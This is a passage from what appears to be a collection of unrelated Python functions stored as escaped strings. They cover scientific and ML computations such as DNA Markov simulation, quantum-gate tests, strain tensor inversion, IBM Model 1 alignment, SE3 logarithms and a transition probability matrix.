probabilities\n if matrix[0][0] > w:\n sims.append('A')\n elif matrix[0][1] + matrix[0][0] > w:\n sims.append('C')\n elif matrix[0][2] + matrix[0][1] + matrix[0][0] > w:\n sims.append('G')\n else:\n sims.append('T')\n elif sims[-1] == 'C':\n x = np.random.random()\n if matrix[1][0] > x:\n sims.append('A')\n elif matrix[1][1] + matrix[1][0] > x:\n sims.append('C')\n elif matrix[1][2] + matrix[1][1] + matrix[1][0] > x:\n sims.append('G')\n else:\n sims.append('T')\n \n elif sims[-1] == 'G':\n y = np.random.random()\n if matrix[2][0] > y:\n sims.append('A')\n elif matrix[2][1] + matrix[2][0] > y:\n sims.append('C')\n elif matrix[2][2] + matrix[2][1] + matrix[2][0] > y:\n sims.append('G')\n else:\n sims.append('T')\n\n else:\n z = np.random.random()\n if matrix[3][0] > z:\n sims.append('A')\n elif matrix[3][1] + matrix[3][0] > z:\n sims.append('C')\n elif matrix[3][2] + matrix[3][1] + matrix[3][0] > z:\n sims.append('G')\n else:\n sims.append('T')\n\n return sims[1:-1] # remove the initial value (the seed)", "def test_superposition_ud_cnot():\n program = dedent(\n \"\"\"\\\n register q0[0]\n register q1[1]\n H q1\n CNOT q1 q0\n \"\"\"\n )\n\n result = run(program, run_gate_array, return_distribution=True)\n assert isclose(result, [0.5, 0.0, 0.0, 0.5]).all()", "def MPinv(list_of_ch,direction, angle, azimuth):\n\n\n \"\"\"~~~~~~~~~~~ Input conditions ~~~~~~~~~~~~~~\"\"\"\n ch_list = list_of_ch\n direction_deg = float(direction) #inclined direction of wellbore from North\n angle_deg = float(angle) # inclined angle of well \n azimuth_deg = float(azimuth) # core orientation from North or inclined direction \n \"\"\"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \"\"\"\n\n azimuth_deg = azimuth_deg - 45\n\n \"\"\"~~~~~~~~~~~ Allocate numbers to each direction (for example, xx => 0, xy => 3 etc...) ~~~~~~~~~~~~~~\"\"\"\n ch_col = ch_list.columns.values\n\n if \"xx\" in ch_col: ch_list.at[\"ch_no\",\"xx\"] =0\n if \"yy\" in ch_col: ch_list.at[\"ch_no\",\"yy\"] =1\n if \"zz\" in ch_col: ch_list.at[\"ch_no\",\"zz\"] =2\n if \"xy\" in ch_col: ch_list.at[\"ch_no\",\"xy\"] =3\n if \"yx\" in ch_col: ch_list.at[\"ch_no\",\"yx\"] =4\n if \"yz\" in ch_col: ch_list.at[\"ch_no\",\"yz\"] =5\n if \"zy\" in ch_col: ch_list.at[\"ch_no\",\"zy\"] =6\n if \"zx\" in ch_col: ch_list.at[\"ch_no\",\"zx\"] =7\n if \"xz\" in ch_col: ch_list.at[\"ch_no\",\"xz\"] =8\n\n ch = ch_list.loc[\"ch_no\",:].values\n \"\"\"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \"\"\"\n\n Number_of_vector = len(ch)\n No_v = Number_of_vector\n direction_rad = direction_deg*pi*180**(-1) \n angle_rad = angle_deg*pi*180**(-1) \n azimuth_rad = azimuth_deg*pi*180**(-1) \n\n\n \"\"\"~~~~~~~~ Create matrix of Direction Cosine vectors~~~~~~~~~~~~~~~~~~~~~~~ \"\"\"\n c=np.cos(0.25*pi)\n s=np.sin(0.25*pi)\n n = np.zeros((3,9))\n\n n[:,0] = np.array([1,0,0])\n n[:,1] = np.array([0,1,0])\n n[:,2] = np.array([0,0,1])\n n[:,3] = np.array([c,s,0])\n n[:,4] = np.array([c,-s,0])\n n[:,5] = np.array([0,c,s])\n n[:,6] = np.array([0,c,-s])\n n[:,7] = np.array([c,0,s])\n n[:,8] = np.array([-c,0,s])\n\n\n \"\"\"~~~~~~~~~~~~~~ coordinate transformation from 'ASR local co-ordinate' to 'Geological co-ordinate' ~~~~~~~~~~~~~~~~~\"\"\"\n cdr = np.cos(direction_rad)\n sdr = np.sin(direction_rad)\n\n caz = np.cos(azimuth_rad)\n saz = np.sin(azimuth_rad)\n\n can = np.cos(angle_rad)\n san = np.sin(angle_rad)\n\n Rdr = np.array([[cdr, sdr, 0],[-sdr, cdr, 0],[0, 0, 1]]) #counter_clockwise\n Ran = np.array([[1, 0, 0],[0, can, san],[0, -san, can]])\n Raz = np.array([[caz, -saz, 0],[saz, caz, 0],[0, 0, 1]])\n\n R1 = Ran.dot(Rdr)\n R2 = Raz.dot(R1)\n\n for i in range(0,9):\n n[:,i] = R2.dot(n[:,i])\n n= np.round(n,6)\n \"\"\"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \"\"\"\n\n\n \"\"\"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \"\"\"\n\n\n\n\n\n \"\"\"~~~~~~~~ Create matrix A (b = Ax: b;Observed normal strain data, x;strain tensor component which we have to determine) ~~~~~~~~~~~~~~~~~~~~~~~ \"\"\"\n X = np.empty((No_v,6))\n\n for i in range(0,No_v):\n cc = ch[i]\n X[i,:] = np.array([n[0,cc]**2, n[1,cc]**2, n[2,cc]**2, 2*n[0,cc]*n[1,cc], 2*n[1,cc]*n[2,cc], 2*n[2,cc]*n[0,cc]])\n \"\"\"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \"\"\"\n\n\n X_inv = np.linalg.pinv(X) # Calculate Moore-Penrose inverse matrix\n\n return X_inv", "def test_active_inference_SPM_1a(self):\n array_path = os.path.join(os.getcwd(), DATA_PATH + \"vbx_test_1a.mat\")\n mat_contents = loadmat(file_name=array_path)\n\n A = mat_contents[\"A\"][0]\n B = mat_contents[\"B\"][0]\n C = to_arr_of_arr(mat_contents[\"C\"][0][0][:,0])\n obs_matlab = mat_contents[\"obs\"].astype(\"int64\")\n policy = mat_contents[\"policies\"].astype(\"int64\") - 1\n t_horizon = mat_contents[\"t_horizon\"][0, 0].astype(\"int64\")\n actions_matlab = mat_contents[\"actions\"].astype(\"int64\") - 1\n qs_matlab = mat_contents[\"qs\"][0]\n xn_matlab = mat_contents[\"xn\"][0]\n vn_matlab = mat_contents[\"vn\"][0]\n\n likelihoods_matlab = mat_contents[\"likelihoods\"][0]\n\n num_obs, num_states, _, num_factors = get_model_dimensions(A, B)\n obs = convert_observation_array(obs_matlab, num_obs)\n T = len(obs)\n\n agent = Agent(A=A, B=B, C=C, inference_algo=\"MMP\", policy_len=1, \n inference_horizon=t_horizon, use_BMA = False, \n policy_sep_prior = True)\n \n actions_python = np.zeros(T)\n\n for t in range(T):\n o_t = (np.where(obs[t])[0][0],)\n qx, xn_t, vn_t = agent.infer_states_test(o_t)\n q_pi, efe= agent.infer_policies()\n action = agent.sample_action()\n\n actions_python[t] = action\n\n xn_python = build_xn_vn_array(xn_t)\n vn_python = build_xn_vn_array(vn_t)\n\n if t == T-1:\n xn_python = xn_python[:,:,:-1,:]\n vn_python = vn_python[:,:,:-1,:]\n\n start_tstep = max(0, agent.curr_timestep - agent.inference_horizon)\n end_tstep = min(agent.curr_timestep + agent.policy_len, T)\n\n xn_validation = xn_matlab[0][:,:,start_tstep:end_tstep,t,:]\n vn_validation = vn_matlab[0][:,:,start_tstep:end_tstep,t,:]\n\n self.assertTrue(np.isclose(xn_python, xn_validation).all())\n self.assertTrue(np.isclose(vn_python, vn_validation).all())\n \n self.assertTrue(np.isclose(actions_matlab[0,:],actions_python[:-1]).all())", "def __init__(self, u1=(1,0,0), u2=(0,1,0), u3=(0,0,1)):\n u1 = vec3(u1)\n u2 = vec3(u2)\n u3 = vec3(u3)\n\n if triple_scalar_product(u1, u2, u3) != 1:\n print >> sys.stderr, \"!! Invalid lattice vectors: u1 = %s, u2 = %s, u3 = %s\" % (u1,u2,u3)\n self.e1 = vec3(1,0,0)\n self.e2 = vec3(0,1,0)\n self.e3 = vec3(0,0,1)\n else:\n s1 = square(u1)\n s2 = square(u2)\n d12 = dot(u1, u2)\n d23 = dot(u2, u3)\n d13 = dot(u1, u3)\n alpha = -d12/s1\n gamma = -(alpha*d13 + d23)/(alpha*d12 + s2)\n beta = -(d13 + gamma*d12)/s1\n self.e1 = u1\n self.e2 = u2 + alpha*u1\n self.e3 = u3 + beta*u1 + gamma*u2\n\n if verbose:\n print(\"e1 = %s\" % self.e1)\n print(\"e2 = %s\" % self.e2)\n print(\"e3 = %s\" % self.e3)\n\n self.L1 = length(self.e1)\n self.L2 = length(self.e2)\n self.L3 = length(self.e3)\n self.n1 = self.e1/self.L1\n self.n2 = self.e2/self.L2\n self.n3 = self.e3/self.L3\n self.cells = []\n\n v0 = vec3(0,0,0)\n self.v = [v0,\n v0 + self.e3,\n v0 + self.e2,\n v0 + self.e2 + self.e3,\n v0 + self.e1,\n v0 + self.e1 + self.e3,\n v0 + self.e1 + self.e2,\n v0 + self.e1 + self.e2 + self.e3]\n\n # Compute bounding box of cuboid\n xs = [vk.x for vk in self.v]\n ys = [vk.y for vk in self.v]\n zs = [vk.z for vk in self.v]\n vmin = vec3(min(xs), min(ys), min(zs))\n vmax = vec3(max(xs), max(ys), max(zs))\n\n # Extend to nearest integer coordinates\n ixmin = int(floor(vmin.x))\n ixmax = int(ceil(vmax.x))\n iymin = int(floor(vmin.y))\n iymax = int(ceil(vmax.y))\n izmin = int(floor(vmin.z))\n izmax = int(ceil(vmax.z))\n if verbose:\n print(\"ixmin, ixmax = %d, %d\" % (ixmin,ixmax))\n print(\"iymin, iymax = %d, %d\" % (iymin,iymax))\n print(\"izmin, izmax = %d, %d\" % (izmin,izmax))\n\n # Determine which cells (and which faces within those cells) are non-trivial\n for ix in range(ixmin, ixmax):\n for iy in range(iymin, iymax):\n for iz in range(izmin, izmax):\n shift = vec3(-ix, -iy, -iz)\n faces = [Plane(self.v[0] + shift, +self.n1),\n Plane(self.v[4] + shift, -self.n1),\n Plane(self.v[0] + shift, +self.n2),\n Plane(self.v[2] + shift, -self.n2),\n Plane(self.v[0] + shift, +self.n3),\n Plane(self.v[1] + shift, -self.n3)]\n\n c = Cell(ix, iy, iz)\n skipcell = False\n for f in faces:\n r = UnitCubeTest(f)\n if r == +1:\n # Unit cube is completely above this plane; this cell is empty\n continue\n elif r == 0:\n # Unit cube intersects this plane; keep track of it\n c.faces.append(f)\n elif r == -1:\n skipcell = True\n break\n\n if skipcell or len(c.faces) == 0:\n if verbose:\n print(\"Skipping cell at (%d,%d,%d)\" % (ix,iy,iz))\n continue\n else:\n self.cells.append(c)\n if verbose:\n print(\"Adding cell at (%d,%d,%d)\" % (ix,iy,iz))\n\n # For the identity remapping, use exactly one cell\n if len(self.cells) == 0:\n self.cells.append(Cell())\n\n # Print the full list of cells\n if verbose:\n print(\"%d non-empty cells\" % len(self.cells))\n for c in self.cells:\n print(\"Cell at (%d,%d,%d) has %d non-trivial planes\" % (c.ix,\n c.iy, c.iz, len(c.faces)))", "def solve_LF(self):\n self.u = zeros(self.N)\n self.u[0] = self.u0\n self.u[1] = self.u1\n u = self.u\n f= self.f\n dt = self.dt\n t = self.t\n N = self.N\n for n in xrange(1,N-1):\n u[n+1] = 2*dt*f(u[n],t[n]) + u[n-1]\n #return t,u", "def test_LM(self):\n\t\t\n\t\tprecision = 10**-8\n\t\t\t\t \n\t\tif self.n == 1:\n\t\t\t\t \n\t\t\tP_sum = sum(self.estimate_prob('', w) for w in self.vocab)\n\t\t\t\n\t\t\tassert abs(1.0 - P_sum) < precision, 'Probability mass does not sum up to one.'\n\t\t\t\t \n\t\telif self.n == 2:\n\t\t\thistories = ['the', 'in', 'at', 'blue', 'white']\n\t\t\t\t \n\t\t\tfor h in histories:\n\t\t\t\t \n\t\t\t\tP_sum = sum(self.estimate_prob(h, w) for w in self.vocab)\n\t\t\t\t\n\t\t\t\tassert abs(1.0 - P_sum) < precision, 'Probability mass does not sum up to one for history' + h\n\t\t\t\t\t \n\t\tprint('TEST SUCCESSFUL!')", "def __v(pk: float, pna: float, pcl: float, pca: float) -> float:\n ex_ion = pk * ex_k + pna * ex_na + pcl * in_cl + pca * ex_ca\n in_ion = pk * in_k + pna * in_na + pcl * ex_cl + pca * in_ca\n v = r * t / f * np.log(ex_ion/in_ion) * 1000\n return v", "def set_T_lm(self):\n self.delta_T_lm_array = ( ((self.exh.T_outlet_array -\n self.cool.T_inlet_array) - (self.exh.T_inlet_array -\n self.cool.T_outlet_array)) / np.log((self.exh.T_outlet_array -\n self.cool.T_inlet_array) / (self.exh.T_inlet_array -\n self.cool.T_outlet_array)) )", "def comp_vext_tem_pyth(self, ao_log=None, numba_parallel=True):\n\n def c2r_lm(conv, clm, clmm, m):\n \"\"\"\n clm: sph harmonic l and m\n clmm: sph harmonic l and -m\n convert from real to complex spherical harmonic\n for an unique value of l and m\n \"\"\"\n rlm = 0.0\n if m == 0:\n rlm = conv._c2r[conv._j, conv._j]*clm\n else:\n rlm = conv._c2r[m+conv._j, m+conv._j]*clm +\\\n conv._c2r[m+conv._j, -m+conv._j]*clmm\n\n if rlm.imag > 1e-10:\n print(rlm)\n raise ValueError(\"Non nul imaginary paert for c2r conversion\")\n return rlm.real\n\n def get_index_lm(l, m):\n \"\"\"\n return the index of an array ordered as \n [l=0 m=0, l=1 m=-1, l=1 m=0, l=1 m=1, ....]\n \"\"\"\n return (l+1)**2 -1 -l + m\n\n warnings.warn(\"Obselete routine use comp_vext_tem\")\n\n if use_numba:\n get_time_potential = nb.jit(nopython=True, parallel=numba_parallel)(get_tem_potential_numba)\n V_time = np.zeros((self.time.size), dtype=np.complex64)\n\n aome = ao_matelem_c(self.ao_log.rr, self.ao_log.pp)\n me = ao_matelem_c(self.ao_log) if ao_log is None else aome.init_one_set(ao_log)\n atom2s = np.zeros((self.natm+1), dtype=np.int64)\n for atom,sp in enumerate(self.atom2sp): \n atom2s[atom+1]= atom2s[atom] + me.ao1.sp2norbs[sp]\n\n R0 = self.vnorm*self.time[0]*self.vdir + self.beam_offset\n rr = self.ao_log.rr\n dr = (np.log(rr[-1])-np.log(rr[0]))/(rr.size-1)\n dt = self.time[1]-self.time[0]\n dw = self.freq_symm[1] - self.freq_symm[0]\n wmin = self.freq_symm[0]\n tmin = self.time[0]\n nff = self.freq.size\n ub = self.freq_symm.size//2 - 1\n l2m = [] # list storing m value to corresponding l\n fact_fft = np.exp(-1.0j*self.freq_symm[ub:ub+nff]*tmin)\n pre_fact = dt*np.exp(-1.0j*wmin*(self.time-tmin))\n\n for l in range(me.jmx+1):\n lm = []\n for m in range(-l, l+1):\n lm.append(m)\n l2m.append(np.array(lm))\n\n for atm, sp in enumerate(self.atom2sp):\n rcut = self.ao_log.sp2rcut[sp]\n center = self.atom2coord[atm, :]\n rmax = find_nearrest_index(rr, rcut)\n\n si = atom2s[atm]\n fi = atom2s[atm+1]\n\n for mu, l in enumerate(self.pb.prod_log.sp_mu2j[sp]):\n s = self.pb.prod_log.sp_mu2s[sp][mu]\n f = self.pb.prod_log.sp_mu2s[sp][mu+1]\n\n fr_val = self.pb.prod_log.psi_log[sp][mu, :]\n inte1 = np.sum(fr_val[0:rmax+1]*rr[0:rmax+1]**(l+2)*rr[0:rmax+1]*dr)\n\n for k in range(s, f):\n V_time.fill(0.0)\n\n m = l2m[l][k-s]\n ind_lm = get_index_lm(l, m)\n ind_lmm = get_index_lm(l, -m)\n\n if use_numba:\n get_time_potential(self.time, R0, self.vnorm, self.vdir, center, rcut, inte1,\n rr, dr, fr_val, me._c2r, l, m, me._j, ind_lm, ind_lmm, V_time)\n else:\n for it, t in enumerate(self.time):\n R_sub = R0 + self.vnorm*self.vdir*(t - self.time[0]) - center\n norm = np.sqrt(np.dot(R_sub, R_sub))\n\n if norm > rcut:\n I1 = inte1/(norm**(l+1))\n I2 = 0.0\n else:\n rsub_max = find_nearrest_index(rr, norm)\n\n I1 = np.sum(fr_val[0:rsub_max+1]*\n rr[0:rsub_max+1]**(l+2)*rr[0:rsub_max+1])\n I2 = np.sum(fr_val[rsub_max+1:]*\n rr[rsub_max+1:]/(rr[rsub_max+1:]**(l-1)))\n\n I1 = I1*dr/(norm**(l+1))\n I2 = I2*(norm**l)*dr\n clm_tem = csphar(R_sub, l)\n clm = (4*np.pi/(2*l+1))*clm_tem[ind_lm]*(I1 + I2)\n clmm = (4*np.pi/(2*l+1))*clm_tem[ind_lmm]*(I1 + I2)\n rlm = c2r_lm(me, clm, clmm, m)\n V_time[it] = rlm + 0.0j\n \n V_time *= pre_fact\n \n\n FT = fft(V_time)\n\n self.V_freq[:, si + k] = FT[ub:ub+nff]*fact_fft", "def exercise_b2_113():\r\n pass", "def trc_fgen_prefb(self,trc,dt,nspad=200,hwin=150,vlen=51):\n output=np.zeros((len(trc),((11*(vlen))+1)))\n pad=np.random.rand(nspad)/100\n trc_norm=trc/np.amax(np.abs(trc))\n trc_norm_padded=np.hstack((pad,trc_norm))\n trc_entropy=self.entropy(trc_norm_padded,50)\n trc_fdm=self.fdm(trc_norm_padded,50,np.arange(1,4),15)\n trc_slta=trigger.classic_sta_lta(trc_norm_padded,2,100)\n trc_fq_win_sum=self.fq_win_sum(trc_norm_padded,hwin,dt)\n hwin2=50\n trc_kurtosis_skew=self.kurtosis_skewness(trc_norm_padded,hwin2)\n for i,j in enumerate(trc):\n ftrc=[]\n fb=i*dt\n ftrc=np.append(ftrc,trc_norm_padded[np.int(nspad+fb/dt)-vlen+1:np.int(nspad+fb/dt)+1])\n ftrc=np.append(ftrc,self.norm(np.gradient(np.abs(trc_norm_padded)))[np.int(nspad+fb/dt)-vlen+1:np.int(nspad+fb/dt)+1])\n ftrc=np.append(ftrc,self.norm(trc_entropy)[np.int(nspad+fb/dt)-vlen+1:np.int(nspad+fb/dt)+1])\n ftrc=np.append(ftrc,self.norm(np.gradient(trc_entropy))[np.int(nspad+fb/dt)-vlen+1:np.int(nspad+fb/dt)+1]) \n ftrc=np.append(ftrc,self.norm(trc_fdm)[np.int(nspad+fb/dt)-vlen+1:np.int(nspad+fb/dt)+1])\n ftrc=np.append(ftrc,self.norm(np.gradient(trc_fdm))[np.int(nspad+fb/dt)-vlen+1:np.int(nspad+fb/dt)+1]) \n ftrc=np.append(ftrc,self.norm(trc_slta)[np.int(nspad+fb/dt)-vlen+1:np.int(nspad+fb/dt)+1])\n ftrc=np.append(ftrc,self.norm(trc_fq_win_sum)[np.int(nspad+fb/dt)-vlen+1:np.int(nspad+fb/dt)+1])\n ftrc=np.append(ftrc,self.norm(np.gradient(trc_fq_win_sum))[np.int(nspad+fb/dt)-vlen+1:np.int(nspad+fb/dt)+1])\n ftrc=np.append(ftrc,self.norm(trc_kurtosis_skew[0])[np.int(nspad+fb/dt)-vlen+1:np.int(nspad+fb/dt)+1])\n ftrc=np.append(ftrc,self.norm(trc_kurtosis_skew[1])[np.int(nspad+fb/dt)-vlen+1:np.int(nspad+fb/dt)+1])\n ftrc=np.append(ftrc,1)\n output[i,:]=ftrc\n return output", "def expected_counts(p0, T, n): \n M=T.shape[0]\n if n<=M:\n return ec_matrix_vector(p0, T, n)\n else:\n return ec_geometric_series(p0, T, n)", "def p(e, t):\n return b * e ** 2", "def em_step(t, eng, fre):\n # TODO\n # Lecture Steps:\n # 1. Make a table of P(f|e) for all possible pairs of f and e, prob_tab\n # 2. Make a grid where each sentence pair is a row and each possible\n # alignment is a column\n # 3. For each sentence pair and alignment compute P(F|a,E)\n # Given aligned words f1,f2,...,fn and e1,e2,...,en in the pair:\n # P(F|a,E) = prob_tab[f1][e1] * ... * prob_tab[fn][en]\n # 4. For each sentence pair and alignment\n # divide P(F|a,E) by the sum of the P(F|a,E)'s in the row\n # this is P(a|E,F)\n # 5. For each possible word pair e and f, sum P(a|E,F) across all\n # alignments and sentence pairs for each instance that e is aligned\n # with f, this gets out a TCount table\n # 6. Sum over the rows of TCount to get the total estimates for each\n # english word e.\n # 7. Compute P(f|e) = TCount[f][e] / Total[e]\n # This is the model after 1 iteration.\n\n '''\n Tutorial Steps:\n initialize P(f|e)\n for a number of iterations:\n set tcount(f, e) to 0 for all f, e\n set total(e) to 0 for all e\n for each sentence pair (F, E) in training corpus:\n for each unique word f in F:\n denom_c = 0\n for each unique word e in E:\n denom_c += P(f|e) * F.count(f)\n for each unique word e in E:\n tcount(f, e) += P(f|e) * F.count(f) * E.count(e) / denom_c\n total(e) += P(f|e) * F.count(f) * E.count(e) / denom_c\n for each e in domain(total(:)):\n for each f in domain(tcount(:,e)):\n P(f|e) = tcount(f, e) / total(e)\n '''\n\n '''\n My Pseudocode:\n The Table of P(f|e) is already initiated as the AM dictionary.\n Presumably the AM is passed in as t.\n Initialize TCount as a dictionary like AM, e.g. TCount[e][f] = 0\n Initialize Total as a dictionary with the same entries as TCount[e] = 0\n for i in range(0,len(eng)):\n\n '''\n AM = dict.fromkeys(t.keys(), 0)\n Total = dict.fromkeys(t.keys(), 0)\n TCount = dict.fromkeys(t.keys(), 0)\n for key in TCount.keys():\n TCount[key] = dict.fromkeys(t[key].keys(), 0)\n AM[key] = dict.fromkeys(t[key].keys(), 0)\n\n num_sentences = min(len(eng), len(fre))\n for i in range(0, num_sentences):\n E = eng[i]\n F = fre[i]\n E_uniques = list(set(E))\n F_uniques = list(set(F))\n for f in F_uniques:\n denom_c = 0\n for e in E_uniques:\n denom_c += t[e][f] * F.count(f)\n for e in E_uniques:\n TCount[e][f] += t[e][f] * F.count(f) * E.count(e) / denom_c\n Total[e] += t[e][f] * F.count(f) * E.count(e) / denom_c\n for e in Total.keys():\n for f in TCount[e].keys():\n AM[e][f] = TCount[e][f] / Total[e]\n\n return AM", "def main() -> int:\n ucvm_out = \"\"\n for j in frange(CORNERS[\"bl\"][\"n\"], CORNERS[\"ur\"][\"n\"], SPACING):\n for i in frange(CORNERS[\"bl\"][\"e\"], CORNERS[\"ur\"][\"e\"] + SPACING, SPACING):\n ucvm_out += \"%.2f %.2f 0\\n\" % (i, j)\n os.chdir(\"/Users/davidgil/ucvm-15.10.0/bin\")\n proc = Popen(\n [\"./ucvm_query\", \"-f\", \"../conf/ucvm.conf\"], stdout=PIPE, stdin=PIPE, stderr=STDOUT\n )\n out_arr = np.zeros(\n shape=(\n int((CORNERS[\"ur\"][\"n\"] - CORNERS[\"bl\"][\"n\"]) / SPACING) + 2,\n int((CORNERS[\"ur\"][\"e\"] - CORNERS[\"bl\"][\"e\"]) / SPACING) + 2\n )\n )\n output = proc.communicate(input=ucvm_out.encode(\"ASCII\"))[0]\n i = 0\n j = 0\n for line in output.decode(\"ASCII\").split(\"\\n\")[2:-1]:\n line_split = line.split()\n try:\n out_arr[j][i] = float(line_split[4])\n except IndexError:\n print(line_split)\n if i == int((CORNERS[\"ur\"][\"e\"] - CORNERS[\"bl\"][\"e\"]) / SPACING):\n i = 0\n j += 1\n else:\n i += 1\n np.save(\"vs30.dat\", out_arr)\n return 0", "def log_operator(SE3): \n #print('SE3 log: ', SE3)\n R = SE3[:3,:3]\n t = SE3[:3,3]\n theta = arccos(0.5*(trace(R)-1)) # radians\n lnR = 0.5*(theta/sin(theta))*(R-R.T)\n omega = vee(lnR) # vee operator\n omega_skew_sym = lnR#skew_symmetric(omega.reshape(-1,))\n \n if theta <= 1e-10:\n V = eye(3)\n else:\n V = eye(3) + \\\n (theta**-2)*(1-cos(theta))*omega_skew_sym + \\\n (theta**-3)*(theta-sin(theta))*(omega_skew_sym @ omega_skew_sym)\n neu = inv(V) @ t\n\n # if theta <= 1e-10:\n # Vinv = eye(3)\n # else:\n # theta_half = 0.5*theta \n # Vinv = eye(3) - 0.5*omega_skew_sym + \\\n # (theta**-2)*(1- (theta_half*cos(theta_half)/sin(theta_half)))*(omega_skew_sym @ omega_skew_sym)\n # neu = Vinv @ t\n\n return np.hstack((neu, omega)).reshape(-1,1)", "def fig16():\n # fmt: off\n tpm = np.array([\n [0, 0, 0, 0, 0, 0, 0],\n [0, 0, 1, 0, 1, 0, 0],\n [1, 0, 1, 0, 0, 0, 0],\n [1, 0, 0, 0, 1, 0, 0],\n [1, 0, 0, 0, 0, 0, 0],\n [1, 0, 1, 0, 1, 0, 0],\n [1, 0, 1, 0, 0, 0, 0],\n [1, 0, 0, 0, 1, 0, 0],\n [0, 0, 0, 1, 1, 0, 0],\n [0, 0, 1, 1, 1, 0, 0],\n [1, 0, 1, 1, 1, 0, 0],\n [1, 0, 0, 1, 1, 0, 0],\n [1, 0, 0, 1, 1, 0, 0],\n [1, 1, 1, 1, 1, 0, 0],\n [1, 0, 1, 1, 1, 0, 0],\n [1, 1, 0, 1, 1, 0, 0],\n [0, 0, 0, 1, 1, 0, 0],\n [0, 0, 1, 1, 1, 0, 0],\n [1, 0, 1, 1, 1, 0, 0],\n [1, 0, 0, 1, 1, 0, 0],\n [1, 0, 0, 1, 1, 0, 0],\n [1, 0, 1, 1, 1, 0, 0],\n [1, 0, 1, 1, 1, 0, 0],\n [1, 0, 0, 1, 1, 0, 0],\n [0, 0, 0, 1, 1, 0, 0],\n [0, 0, 1, 1, 1, 0, 0],\n [1, 0, 1, 1, 1, 0, 0],\n [1, 0, 0, 1, 1, 0, 0],\n [1, 0, 0, 1, 1, 0, 0],\n [1, 1, 1, 1, 1, 0, 0],\n [1, 0, 1, 1, 1, 0, 0],\n [1, 1, 0, 1, 1, 0, 0],\n [0, 0, 0, 0, 0, 1, 0],\n [0, 0, 1, 0, 1, 1, 0],\n [1, 0, 1, 0, 0, 1, 0],\n [1, 0, 0, 0, 1, 1, 0],\n [1, 0, 0, 0, 0, 1, 0],\n [1, 0, 1, 0, 1, 1, 0],\n [1, 0, 1, 0, 0, 1, 0],\n [1, 0, 0, 0, 1, 1, 0],\n [0, 0, 0, 1, 1, 1, 0],\n [0, 0, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 1, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 1, 0, 1, 1, 1, 0],\n [0, 0, 0, 1, 1, 1, 0],\n [0, 0, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [0, 0, 0, 1, 1, 1, 0],\n [0, 0, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 1, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 1, 0, 1, 1, 1, 0],\n [0, 0, 0, 0, 0, 1, 0],\n [0, 0, 1, 0, 1, 1, 0],\n [1, 0, 1, 0, 0, 1, 0],\n [1, 0, 0, 0, 1, 1, 0],\n [1, 0, 0, 0, 0, 1, 0],\n [1, 0, 1, 0, 1, 1, 0],\n [1, 0, 1, 0, 0, 1, 0],\n [1, 0, 0, 0, 1, 1, 0],\n [0, 0, 0, 1, 1, 1, 0],\n [0, 0, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 1, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 1, 0, 1, 1, 1, 0],\n [0, 0, 0, 1, 1, 1, 0],\n [0, 0, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [0, 0, 0, 1, 1, 1, 0],\n [0, 0, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 1, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 1, 0, 1, 1, 1, 0],\n [0, 0, 0, 0, 0, 1, 1],\n [0, 0, 1, 0, 1, 1, 1],\n [1, 0, 1, 0, 0, 1, 1],\n [1, 0, 0, 0, 1, 1, 1],\n [1, 0, 0, 0, 0, 1, 1],\n [1, 0, 1, 0, 1, 1, 1],\n [1, 0, 1, 0, 0, 1, 1],\n [1, 0, 0, 0, 1, 1, 1],\n [0, 0, 0, 1, 1, 1, 1],\n [0, 0, 1, 1, 1, 1, 1],\n [1, 0, 1, 1, 1, 1, 1],\n [1, 0, 0, 1, 1, 1, 1],\n [1, 0, 0, 1, 1, 1, 1],\n [1, 1, 1, 1, 1, 1, 1],\n [1, 0, 1, 1, 1, 1, 1],\n [1, 1, 0, 1, 1, 1, 1],\n [0, 0, 0, 1, 1, 1, 1],\n [0, 0, 1, 1, 1, 1, 1],\n [1, 0, 1, 1, 1, 1, 1],\n [1, 0, 0, 1, 1, 1, 1],\n [1, 0, 0, 1, 1, 1, 1],\n [1, 0, 1, 1, 1, 1, 1],\n [1, 0, 1, 1, 1, 1, 1],\n [1, 0, 0, 1, 1, 1, 1],\n [0, 0, 0, 1, 1, 1, 1],\n [0, 0, 1, 